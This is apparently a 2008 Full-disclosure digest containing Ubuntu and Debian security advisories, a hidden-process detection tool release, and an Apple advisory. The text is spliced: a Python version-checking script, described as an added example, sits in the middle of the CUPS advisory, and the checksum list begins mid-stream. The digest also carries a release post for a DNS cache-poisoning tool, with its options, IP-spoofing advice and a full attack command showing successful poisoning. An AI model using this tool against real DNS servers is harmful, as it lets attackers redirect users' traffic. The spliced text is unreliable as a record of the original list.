Date: Fri, 1 Aug 2008 08:27:01 -0700
Subject: [Full-disclosure] [USN-634-1] OpenLDAP vulnerability
Message-ID: <20080801152701.GF21348@outflux.net>

===========================================================
Ubuntu Security Notice USN-634-1             August 01, 2008
openldap2.2, openldap2.3 vulnerability
CVE-2008-2952
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  slapd                           2.2.26-5ubuntu2.8

Ubuntu 7.04:
  slapd                           2.3.30-2ubuntu0.3

Ubuntu 7.10:
  slapd                           2.3.35-1ubuntu0.3

Ubuntu 8.04 LTS:
  slapd                           2.4.9-0ubuntu0.8.04.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Cameron Hotchkies discovered that OpenLDAP did not correctly handle
certain ASN.1 BER data. A remote attacker could send a specially
crafted packet and crash slapd, leading to a denial of service.
From thijs at debian.org Fri Aug 1 08:52:06 2008
From: thijs at debian.org (Thijs Kinkhorst)
Date: Fri, 1 Aug 2008 09:52:06 +0200 (CEST)
Subject: [Full-disclosure] [SECURITY] [DSA 1625-1] New cupsys packages fix arbitrary code execution
Message-ID: <20080801075206.95B8C326EFC@morgana.loeki.tv>

------------------------------------------------------------------------
Debian Security Advisory DSA-1625-1                  security at debian.org
http://www.debian.org/security/                           Thijs Kinkhorst
August 01, 2008                       http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : cupsys
Vulnerability  : buffer overflows
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-0053 CVE-2008-1373 CVE-2008-1722
Debian Bug     : 476305

Several remote vulnerabilities have been discovered in the Common Unix
Printing System (CUPS). The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2008-0053

    Buffer overflows in the HP-GL input filter could allow arbitrary
    code execution through crafted HP-GL files.

CVE-2008-1373

    A buffer overflow in the GIF filter could allow arbitrary code
    execution through crafted GIF files.

CVE-2008-1722

    Integer overflows in the PNG filter could allow arbitrary code
    execution through crafted PNG files.

For the stable distribution (etch), these problems have been fixed in
version 1.2.7-4etch4 of package cupsys.

For the testing (lenny) and unstable distribution (sid), these problems
have been fixed in version 1.3.7-2 of package cups.

We recommend that you upgrade your cupsys package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
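One check a practitioner would want after reading the three advisories above (USN-633-1, USN-634-1 and DSA-1625-1): compare the package versions actually installed against the fixed versions the advisories name, using dpkg's own ordering rules so that a revision such as 1ubuntu1.10 is not mistaken for an older one than 1ubuntu1.2. This is an added example, not code from Ubuntu, Debian or the advisory authors; the version comparison is a port of dpkg's algorithm, the release keys are the example's own labels, and the dpkg-query lines are constructed sample input.

```python
"""Check installed package versions against the fixed versions named in
USN-633-1, USN-634-1 and DSA-1625-1 (added example; not code from Ubuntu,
Debian or the advisories).  The comparison is a port of dpkg's verrevcmp()
ordering, so e.g. 1.1.22-1ubuntu1.10 correctly sorts after 1.1.22-1ubuntu1.2."""

# Fixed versions quoted in the advisories above.  The release keys are this
# example's own labels, not identifiers used by the advisories.
FIXED_VERSIONS = {
    ("ubuntu-6.06", "libxslt1.1"): "1.1.15-1ubuntu1.2",
    ("ubuntu-7.04", "libxslt1.1"): "1.1.20-0ubuntu2.2",
    ("ubuntu-7.10", "libxslt1.1"): "1.1.21-2ubuntu2.2",
    ("ubuntu-8.04", "libxslt1.1"): "1.1.22-1ubuntu1.2",
    ("ubuntu-6.06", "slapd"): "2.2.26-5ubuntu2.8",
    ("ubuntu-7.04", "slapd"): "2.3.30-2ubuntu0.3",
    ("ubuntu-7.10", "slapd"): "2.3.35-1ubuntu0.3",
    ("ubuntu-8.04", "slapd"): "2.4.9-0ubuntu0.8.04.1",
    ("debian-etch", "cupsys"): "1.2.7-4etch4",
}


def _order(c):
    """Sort weight of one character inside a non-digit run (dpkg's order())."""
    if c == "" or c.isdigit():
        return 0
    if c == "~":
        return -1            # '~' sorts before everything, even end of string
    if c.isalpha():
        return ord(c)        # letters sort before all other characters
    return ord(c) + 256


def _verrevcmp(a, b):
    """Compare two upstream-version or revision strings the way dpkg does:
    alternate between a non-digit run (compared character by character with
    _order) and a digit run (compared numerically, leading zeros ignored)."""
    i = j = 0
    while i < len(a) or j < len(b):
        # Non-digit run: ends at the first digit (or end of string) on both sides.
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            ac = _order(a[i] if i < len(a) else "")
            bc = _order(b[j] if j < len(b) else "")
            if ac != bc:
                return ac - bc
            i += 1
            j += 1
        # Digit run: strip leading zeros; the longer run wins, otherwise the
        # first differing digit decides.
        while i < len(a) and a[i] == "0":
            i += 1
        while j < len(b) and b[j] == "0":
            j += 1
        first_diff = 0
        while i < len(a) and a[i].isdigit() and j < len(b) and b[j].isdigit():
            if first_diff == 0:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if i < len(a) and a[i].isdigit():
            return 1
        if j < len(b) and b[j].isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def _split(version):
    """Split '[epoch:]upstream[-revision]' into (epoch, upstream, revision)."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    upstream, sep, revision = version.rpartition("-")
    if not sep:                      # no Debian revision at all
        upstream, revision = version, ""
    return epoch, upstream, revision


def compare_versions(v1, v2):
    """Return a negative, zero or positive number, like
    'dpkg --compare-versions v1 lt/eq/gt v2'."""
    e1, u1, r1 = _split(v1)
    e2, u2, r2 = _split(v2)
    if e1 != e2:
        return e1 - e2
    return _verrevcmp(u1, u2) or _verrevcmp(r1, r2)


# Constructed sample of "dpkg-query -W -f='${Package} ${Version}\n'" output
# for an Ubuntu 8.04 host; the libxslt build is one revision behind the fix.
SAMPLE_DPKG_OUTPUT = """\
libxslt1.1 1.1.22-1ubuntu1.1
slapd 2.4.9-0ubuntu0.8.04.1
bash 3.2-0ubuntu18
"""


def check_installed(release, dpkg_output):
    """Return [(package, installed, fixed)] for every package in dpkg_output
    that the advisory table lists for this release and that is still older
    than the fixed version."""
    vulnerable = []
    for line in dpkg_output.splitlines():
        if not line.strip():
            continue
        package, installed = line.split()
        fixed = FIXED_VERSIONS.get((release, package))
        if fixed is not None and compare_versions(installed, fixed) < 0:
            vulnerable.append((package, installed, fixed))
    return vulnerable


if __name__ == "__main__":
    for package, installed, fixed in check_installed("ubuntu-8.04", SAMPLE_DPKG_OUTPUT):
        print(f"{package}: installed {installed} is older than fixed {fixed}")
```

On a real host, feed the function the output of the dpkg-query command from the comment instead of the constructed sample.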
Size/MD5 checksum: 85968 8d69f2ac63f2d4fbd923c2caa33c604d http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_amd64.deb Size/MD5 checksum: 36352 02c24a715c2f06dd8bc62a851591948e http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_amd64.deb Size/MD5 checksum: 162230 0e2325c67bf23841038be68557ba8758 arm architecture (ARM) http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_arm.deb Size/MD5 checksum: 48718 28a8ac4acad82bd582358e38c0c23013 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_arm.deb Size/MD5 checksum: 78910 6566d320a557b02cf94f379b84f0dba9 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_arm.deb Size/MD5 checksum: 35936 6ae06d35d6c40084adfd8bfd65866174 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_arm.deb Size/MD5 checksum: 1025732 5c3e851e94f3a41216d7a7149839c8d4 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_arm.deb Size/MD5 checksum: 132040 3eb0b900c59ea118d768b1459898ea90 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_arm.deb Size/MD5 checksum: 154878 02d749b77969111a813a4cba408bd74d http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_arm.deb Size/MD5 checksum: 1568968 5c60803b01b551503017f750bea5526e http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_arm.deb Size/MD5 checksum: 85168 5b2a0162f00efdcc8cd1d93e0bc7486b hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 172120 3b9de8875c9be02866143463b0c919f0 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 91152 ab272c582600f995706b46709c510f32 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 1022644 
b587ee12458f80bd76a1d7b84869b741 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 57192 4e117dab53e958404f958b99b08da4c1 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 154086 2a27882b763ce10df0fd172cfa8d22bb http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 86898 aebbadb4ddb70dde9a524fd56b7bfb46 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 1624440 67216c81ae5f4d2f1d8b571f7099492e http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 39270 1bbd6351cb6cd5f686faaddbeb731c4f i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_i386.deb Size/MD5 checksum: 86844 5dd05c3c3f08b1e2a60405bcaef83146 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_i386.deb Size/MD5 checksum: 79334 2002dc686f12bb5250d9fafb9b63a268 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_i386.deb Size/MD5 checksum: 53272 1723eb6d5f00ce02702b52b60610c586 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_i386.deb Size/MD5 checksum: 36230 cda0348c0c9b6dbd145e3c02e0c44fd2 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_i386.deb Size/MD5 checksum: 1004104 10a43e1b53f782d065362e92ff0998f9 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_i386.deb Size/MD5 checksum: 137972 203602cf657f98ee38a372c3922b7ae1 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_i386.deb Size/MD5 checksum: 160382 2fa7444168c9f43a22eb776bd9638827 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_i386.deb Size/MD5 checksum: 1559230 dfca65e3edd6f0fb4bdc18973efef89a ia64 architecture 
(Intel ia64) http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 203930 b457e7ae7fb11f876225150e559a4272 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 46330 922f2bd1d98fcbb40badcebd7c0cc07c http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 106642 b61d48e93e413245d3fd5ebe47c31243 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 1107892 65945b9397a13a31fb8646cb71ef7794 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 192372 eea62b30397305acdf6f98a6df50cf8e http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 1770682 398872427b493f8206c38a3504fc1904 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 74158 e1f00e7e8be7549ac2b58adaeba0f5b2 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 106226 fb838547edf473df7efaa8fe41cf42f1 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_mips.deb Size/MD5 checksum: 86546 02bd3a3bb274f21179f65edfb28c1f7e http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_mips.deb Size/MD5 checksum: 76158 53a90a54e6cf7418b81e0b40db39566b http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_mips.deb Size/MD5 checksum: 36116 8d78c13d605160ee0caa835961667913 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_mips.deb Size/MD5 checksum: 150982 b48a8bcf9dbff3e842f83f4ca05e0421 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_mips.deb Size/MD5 checksum: 1097820 db2ff50e5555b022b54252f07b442992 
http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_mips.deb Size/MD5 checksum: 157742 94a7c2d49b7234c0a54291446c5ba06d http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_mips.deb Size/MD5 checksum: 1567460 dffd05c006a78e53bc8c03dc8beaa4ea http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_mips.deb Size/MD5 checksum: 57688 cbce6e984252bef94c0bd7ace9afdcdf mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 86688 7c91af84b2fab2419fa4939bb8080097 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 1552918 7d7af09023892fdd9e862ddcbb590fb3 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 150896 ba6b2f7c16957759b63e20d66d5964f2 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 36064 702ec7fbc7b2716e10a97f7b7c11e75a http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 158270 0354f63d7126c3775cc74a95426052d4 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 57846 2ee768d4dc5f9c8cbd046a801f154ef8 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 1084676 bb31572c9939fe22762ceef59550b25e http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 77456 5884939dabb325cda97351bafdb62cfe powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 162918 05df3db670b3f2a4dbb9d8a2d666eaca http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 88204 
4546a01b202669d3ffa97dca5b93bf03 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 1576028 67c38bd81585274c0844efeedca40153 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 51894 321b1c0c9d59643294a87b00f81f7895 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 41310 45f55f0797900433a145028d63f6a6ef http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 90004 61698739b3b436e6d1651dc388a89575 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 1142660 10680b3b7efdeb10e9d834e869944206 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 136880 e5c2d81190a9233eb291b519c3b83de6 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_s390.deb Size/MD5 checksum: 166424 a2a07e7c586a10000b519c6f6c2ec4e2 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_s390.deb Size/MD5 checksum: 1586828 1e581be3892b978e7284de896c3121de http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_s390.deb Size/MD5 checksum: 87588 b3d0d3e7dbb84414f606b4670c6e2692 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_s390.deb Size/MD5 checksum: 1036620 bd1b35bd24260dfb340e0a3173a811a2 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_s390.deb Size/MD5 checksum: 37430 622787f6d8b910f3657f98e0f5bf97bc http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_s390.deb Size/MD5 checksum: 82342 40a55f0afa5b2fa03285fd4d4cd8666c http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_s390.deb Size/MD5 checksum: 52468 470a81c78c7ececae0569e75bfab9ca7 
http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_s390.deb Size/MD5 checksum: 144932 9ab43b87566469af9e4a79c9c1fae493 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 139570 5f5faa6504275ed43f4a55787519fdfe http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 78516 7066d103f739cd570fd141aa4fa780f6 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 36032 c4e4289091dc19e5fbf7a6937ffb36f7 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 158816 f33bda24ec7774227b3bdb3dddcf1c46 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 51754 47ce5271662e6b980e34badfc9689009 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 84956 96aa28ac50548723754274f30db15379 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 991408 13a41c49f94085ca6a7f74a030506d3c http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 1562092 2bfd90bca7dbac40df73303f8e1e4b6f These files will probably be moved into the stable distribution on its next update. 
---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/


From thijs at debian.org Fri Aug 1 08:52:19 2008
From: thijs at debian.org (Thijs Kinkhorst)
Date: Fri, 1 Aug 2008 09:52:19 +0200 (CEST)
Subject: [Full-disclosure] [SECURITY] [DSA 1626-1] New httrack packages fix arbitrary code execution
Message-ID: <20080801075219.89076326EFC@morgana.loeki.tv>

------------------------------------------------------------------------
Debian Security Advisory DSA-1626-1                  security at debian.org
http://www.debian.org/security/                           Thijs Kinkhorst
August 01, 2008                          http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : httrack
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
BugTraq ID     : 30425

Joan Calvet discovered that httrack, a utility to create local copies of websites, is vulnerable to a buffer overflow potentially allowing execution of arbitrary code when passed excessively long URLs.

For the stable distribution (etch), this problem has been fixed in version 3.40.4-3.1+etch1.
For the testing (lenny) and unstable distribution (sid), this problem has been fixed in version 3.42.3-1.

We recommend that you upgrade your httrack package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives, the architecture independent package and binary packages for the amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc architectures (httrack 3.40.4-3.1+etch1): package URLs with Size/MD5 checksums.

These files will probably be moved into the stable distribution on its next update.
---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/


From pallav.khandhar at gmail.com Fri Aug 1 08:00:38 2008
From: pallav.khandhar at gmail.com (Pallav Khandhar)
Date: Fri, 1 Aug 2008 12:30:38 +0530
Subject: [Full-disclosure] Tool Release: ProcL - Detect Hidden Process
Message-ID: <2DF34E9C-4ADA-4B31-8966-44B8B3DEC099@gmail.com>

Greetings,

I am glad to release ProcL v1.0. ProcL employs many different methods to detect hidden processes. Essentially, ProcL detailed and implemented a mechanism to embed all these different approaches in one tool to detect hidden processes. Our methods of detecting hidden processes require the examination of each kernel object: EPROCESS, ETHREADS, HANDLES, JOBS. Therefore, we believe, ProcL would defeat process concealment from one certain method.

Hiding a process is particularly threatening because it represents some malicious code running on your system that you are completely unaware of. Process hiding has a significant effect. Many of the trojan, virus, spyware, rootkit writers use similar techniques to hide themselves and stay undetected as long as possible on target machines.
Finding all the ways a rootkit might hide a process is just the first step in defending against the rootkits. Detecting hidden objects is a promising new area in rootkit detection.

For more information on the tool: http://www.scanit.net/rd/tools/03
Download the tool: http://www.scanit.net/files/tools/ProcL.zip

Cheers,
Pallav Khandhar
Sr. Security Researcher
Scanit R&D Lab


From ar at securebits.org Fri Aug 1 16:33:21 2008
From: ar at securebits.org (AR)
Date: Fri, 1 Aug 2008 18:33:21 +0300
Subject: [Full-disclosure] DNS Multiple Race Exploiting Tool
Message-ID: <002e01c8f3eb$f0f17800$d2d46800$@org>

#################################################################################
Subject:   DNS Multiple Race Exploiting Tool release
Homepage:  http://www.securebits.org/dnsmre.html
Download:  http://www.securebits.org/tools/dns_mre-v1.0.tar.gz
OS:        The tool runs on Linux
Target OS: Tested against Windows 2003 Server
#################################################################################

01 Introduction
02 Features
03 Extra Notes
04 Running the Tool
05 Example
06 Credits

01 Introduction
---------------

DNS Multiple Race Exploiting Tool exploits an inherent bug in the implementation of DNS cache. The result of this exploitation is cache poisoning/overwriting with new entries. The exploitation happens by querying a DNS server, that either supports recursion or is configured with forwarders, for non-existent hostnames for a target domain. Along with the queries are fake reply/replies with static Transaction ID(s). Every query will generate another query from the DNS server with a random TXID. If one of the replies contains this specific TXID, the cache is poisoned.
Because the replies are sent directly after the query, they will arrive at the DNS server much earlier than the legitimate reply from some Name Server.

This attack was discovered and announced by Dan Kaminsky of Doxpara Research in July 2008.

02 Features
-----------

A. The tool can attack both unpatched DNS systems as well as patched DNS systems. Attacking a patched system requires a much longer time than an unpatched system though.

B. The tool can launch two modes of attack; one is against a DNS server that supports recursion, and the second mode is against a DNS server configured with forwarder DNS. The attack modes differ in the "flags" carried in the DNS fake replies. Since a DNS server with forwarder(s) sends a query with the "recursion desired" bit set, the reply has to have this bit set, too. Also, the reply has to have the "recursion available" bit set. On the other hand, a DNS server with recursion sends a query with the recursion bit unset (i.e. an iterative query), so the reply has to have this bit unset, too.

C. The tool spoofs the source IP address of the queries. This is useful if the attacker does not want to leave any trace of his IP address on the server.

D. The tool utilizes the CNAME Record Type to inject the false entry. The way the poisoning is implemented is by sending two answer Resource Records (RRs): one is a CNAME RR, and the second is an A record. Every fake reply contains something like:

  [1] abdc.example.com is a CNAME of IN Class for www.example.com
  [2] www.example.com is an A of IN Class for IP 11.22.33.44

E. The tool sends multiple fake replies with different TXIDs to increase the probability of hitting the correct TXID. This is useful in reducing the time needed to generate a "hit". For a server that does not randomize the source port number, the maximum number of iterations needed is 65546 (an average would be 32768).
However, by sending 10 to 15 TXIDs, for example, the probability of making a "hit" is higher in a shorter time; an average of ~3000 iterations is needed.

03 Extra Notes
--------------

[*] There is a sleeping time between sending the Query and the Replies. The currently configured value of this time is 100 milliseconds. This is important because during the test, I found that if the reply is sent directly along with the query, the fake reply would arrive at the server before the server sends its own query and the fake reply would eventually be ignored.

[*] There is another sleeping time between every iteration (query+replies). This "time" is meant to control the amount of packets per second. Currently, this "time" is 100 milliseconds.

[*] The tool does not create the packets in every iteration. It creates the needed packets (1 query and multiple replies based on the number of TXIDs) at once at the beginning. For later iterations, portions of the packets are modified and re-sent again. This is done for faster operation and to use the least amount of memory.

[*] I am currently researching the most optimized and efficient way to poison a DNS system that randomizes the source port address. This includes the threshold number of TXIDs beyond which an attack would be unsuccessful, or sending multiple queries first before sending their corresponding fake replies, and so on.
If you have some ideas and suggestions, please write to me at

04 Running the Tool
-------------------

The command syntax is:

  #./dns_mre [options]

The options are:

  -t   The target DNS server to poison (required)
  -n   The Name Server used to impersonate (required)
  -s   A spoofed client IP address (optional)
  -p   Source port address used by target to send queries (required)
  -y   Type of the attack (optional; default 1)
         0 for Patched Systems
         1 for Unpatched Systems
  -m   Attack mode (optional; default 0)
         0 Attacking DNS servers configured with forwarders
         1 Attacking DNS Servers that perform recursive queries
  -x   Number of Transaction IDs to use (optional; default 15)

05 Example
----------

To attack the DNS server 11.22.33.44 that sends queries from port 1103 and configured with a forwarder to 44.33.22.11, and inject the entry www.domain.org => 3.2.1.4:

  ./dns_mre -t 11.22.33.44 -n 44.33.22.11 -p 1103 -x 15 -m 0 -s 22.22.22.22 \
      www.example.com 88.55.44.48

  #################################################################
  #              DNS Multiple Race Exploiting Tool                #
  #################################################################
  [*] Attacking server: 11.22.33.44
  [*] Injecting the record: www.domain.org => 3.2.1.4
  [*] Replies are from: 44.33.22.11
  [*] Replies are delivered to port: 1103
  [*] Number of TXIDs to use 15
  [*] IP address used in queries: 22.22.22.22
  [*] Attack mode: Forwarding DNS Server
  [*] The attack is against an unpatched system
  # Initializing...[OK]
  # Preparing query raw packet....[OK]
  # Preparing 15 reply raw packet(s)....[OK]
  # Checking if the server is already poisoned...No, it is not poisoned
  # Launching the Attack...
  maximum iternation 65535
  wait time between each iteration is 100 milliseconds
  wait time between the query and reply is 100 milliseconds
  ############################### 3000 iterations
  Checking to see if the server is poisoned ....Not yet
  ############################## 6000 iterations
  Checking to see if the server is poisoned ....YES
  ** Attack is Successful **

06 Credits
----------

- Dan Kaminsky for originally discovering the attack and for the nice Webinar on July 24th
- Wafa, Saddam, Nicolai, and Ghassan for their support and help

--
AR
Independent Security Researcher
Securebits (http://www.securebits.org)


From security at nruns.com Fri Aug 1 18:29:59 2008
From: security at nruns.com (security at nruns.com)
Date: Fri, 01 Aug 2008 19:29:59 +0200
Subject: [Full-disclosure] n.runs-SA-2008.005 - Apple Inc. - CoreServices Framework's CarbonCore Framework - Arbitrary Code Execution (remote)
Message-ID: <48934817.6000301@nruns.com>

n.runs AG                                                  http://www.nruns.com/
security(at)nruns.com                  n.runs-SA-2008.005            01-Aug-2008
________________________________________________________________________

Vendor:             Apple Inc., http://www.apple.com
Affected Products:  CoreServices Framework's CarbonCore Framework (Used by: i.e. Safari, Mail)
Affected Platforms: Mac OS X v10.4.11
                    Mac OS X Server v10.4.11
                    Mac OS X v10.5.4
                    Mac OS X Server v10.5.4
Vulnerability:      Arbitrary Code Execution (remote)
Risk:               CRITICAL
________________________________________________________________________

Vendor communication:

2008/03/07  Initial notification to Apple Inc. n.runs AG has found a considerable amount of vulnerabilities in Apple's most up-to-date Default Systems and Default Installed Products both on Mac OS 10.5 (Leopard) and iPhone 1.1.4, and intends to send them in several phases to Apple Inc.
2008/03/08  Apple Inc. replies to n.runs AG providing their public pgp key. Apple Inc. states that the Apple Inc.
RFP will be used instead of the n.runs RFP
2008/03/08  n.runs AG responds that vulnerability reporting will only happen under n.runs AG RFP
2008/03/11  Apple Inc. confirms to n.runs AG that the n.runs AG RFP is aligned to their RFP, and that n.runs may continue with further communication and bug reporting
2008/03/11  n.runs AG sends PoCs for various issues to Apple Inc.
2008/03/11  Apple Inc. acknowledges the PoCs, but has issues reproducing some of the vulnerabilities.
2008/03/12  n.runs AG sends more reliable PoCs along with detailed reproduction steps.
2008/03/24  Apple Inc. sends a status report regarding the vulnerabilities reported by n.runs AG
